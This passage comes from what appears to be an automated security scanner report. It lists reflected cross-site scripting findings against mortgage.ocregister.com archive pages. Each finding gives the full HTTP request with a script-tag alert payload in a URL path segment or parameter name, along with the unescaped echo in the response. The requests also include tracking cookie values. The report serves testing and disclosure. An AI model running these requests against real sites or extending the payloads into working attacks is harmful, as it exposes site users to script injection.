Last-Modified: Thu, 03 Feb 2011 19:14:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/0358700\"><script>alert(1)</script>3e5461fd9e3/feed/" />
...[SNIP]...

1.251. http://mortgage.ocregister.com/2008/03/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/03/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c9aad'><script>alert(1)</script>c7ff9075973 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c9aad\\\'><script>alert(1)</script>c7ff9075973 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/03/?c9aad'><script>alert(1)</script>c7ff9075973=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<a href='/2008/03/?c9aad\\\'><script>alert(1)</script>c7ff9075973=1&dem_add_user_answer=true&dem_poll_id=23' rel='nofollow' onclick='return dem_addAnswer(this)' class='dem-add-answer'>
...[SNIP]...

1.252. http://mortgage.ocregister.com/2008/03/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/03/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf812"><script>alert(1)</script>a5833fbe6d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf812\"><script>alert(1)</script>a5833fbe6d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/03/?bf812"><script>alert(1)</script>a5833fbe6d8=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 March - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/03/?bf812\"><script>alert(1)</script>a5833fbe6d8=1feed/" />
...[SNIP]...

1.253. http://mortgage.ocregister.com/2008/04/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/04/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b2c"><script>alert(1)</script>fd2de0df0b8 was submitted in the REST URL parameter 1. This input was echoed as 88b2c\"><script>alert(1)</script>fd2de0df0b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /200888b2c"><script>alert(1)</script>fd2de0df0b8/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200888b2c\"><script>alert(1)</script>fd2de0df0b8/04/feed/" />
...[SNIP]...

1.254. http://mortgage.ocregister.com/2008/04/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/04/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df03a"><script>alert(1)</script>12872902b15 was submitted in the REST URL parameter 2. This input was echoed as df03a\"><script>alert(1)</script>12872902b15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/04df03a"><script>alert(1)</script>12872902b15/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/04df03a\"><script>alert(1)</script>12872902b15/feed/" />
...[SNIP]...

1.255. http://mortgage.ocregister.com/2008/04/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/04/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f116"><script>alert(1)</script>31b6d1dd7c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f116\"><script>alert(1)</script>31b6d1dd7c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/04/?5f116"><script>alert(1)</script>31b6d1dd7c0=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 April - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/04/?5f116\"><script>alert(1)</script>31b6d1dd7c0=1feed/" />
...[SNIP]...

1.256. http://mortgage.ocregister.com/2008/05/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/05/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 559a8"><script>alert(1)</script>09fc2a23169 was submitted in the REST URL parameter 1. This input was echoed as 559a8\"><script>alert(1)</script>09fc2a23169 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008559a8"><script>alert(1)</script>09fc2a23169/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008559a8\"><script>alert(1)</script>09fc2a23169/05/feed/" />
...[SNIP]...

1.257. http://mortgage.ocregister.com/2008/05/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/05/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48dd2"><script>alert(1)</script>a1474685425 was submitted in the REST URL parameter 2. This input was echoed as 48dd2\"><script>alert(1)</script>a1474685425 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/0548dd2"><script>alert(1)</script>a1474685425/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/0548dd2\"><script>alert(1)</script>a1474685425/feed/" />
...[SNIP]...

1.258. http://mortgage.ocregister.com/2008/05/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/05/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d05d5"><script>alert(1)</script>c73cc1d7606 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d05d5\"><script>alert(1)</script>c73cc1d7606 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/05/?d05d5"><script>alert(1)</script>c73cc1d7606=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 May - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/05/?d05d5\"><script>alert(1)</script>c73cc1d7606=1feed/" />
...[SNIP]...

1.259. http://mortgage.ocregister.com/2008/06/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/06/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c18c"><script>alert(1)</script>1d447106e74 was submitted in the REST URL parameter 1. This input was echoed as 3c18c\"><script>alert(1)</script>1d447106e74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20083c18c"><script>alert(1)</script>1d447106e74/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20083c18c\"><script>alert(1)</script>1d447106e74/06/feed/" />
...[SNIP]...

1.260. http://mortgage.ocregister.com/2008/06/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/06/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a31fd"><script>alert(1)</script>9ac39e7e120 was submitted in the REST URL parameter 2. This input was echoed as a31fd\"><script>alert(1)</script>9ac39e7e120 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/06a31fd"><script>alert(1)</script>9ac39e7e120/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/06a31fd\"><script>alert(1)</script>9ac39e7e120/feed/" />
...[SNIP]...

1.261. http://mortgage.ocregister.com/2008/06/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/06/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a408"><script>alert(1)</script>fcc2185e786 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a408\"><script>alert(1)</script>fcc2185e786 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/06/?2a408"><script>alert(1)</script>fcc2185e786=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 June - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/06/?2a408\"><script>alert(1)</script>fcc2185e786=1feed/" />
...[SNIP]...

1.262. http://mortgage.ocregister.com/2008/07/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/07/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fb2a"><script>alert(1)</script>9837c07890b was submitted in the REST URL parameter 1. This input was echoed as 3fb2a\"><script>alert(1)</script>9837c07890b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20083fb2a"><script>alert(1)</script>9837c07890b/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20083fb2a\"><script>alert(1)</script>9837c07890b/07/feed/" />
...[SNIP]...

1.263. http://mortgage.ocregister.com/2008/07/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/07/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d875f"><script>alert(1)</script>52705fa9729 was submitted in the REST URL parameter 2. This input was echoed as d875f\"><script>alert(1)</script>52705fa9729 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/07d875f"><script>alert(1)</script>52705fa9729/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:10 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/07d875f\"><script>alert(1)</script>52705fa9729/feed/" />
...[SNIP]...

1.264. http://mortgage.ocregister.com/2008/07/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/07/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dd31"><script>alert(1)</script>6838ed82b90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4dd31\"><script>alert(1)</script>6838ed82b90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/07/?4dd31"><script>alert(1)</script>6838ed82b90=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 July - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/07/?4dd31\"><script>alert(1)</script>6838ed82b90=1feed/" />
...[SNIP]...

1.265. http://mortgage.ocregister.com/2008/08/ [REST URL parameter 1]

Summary

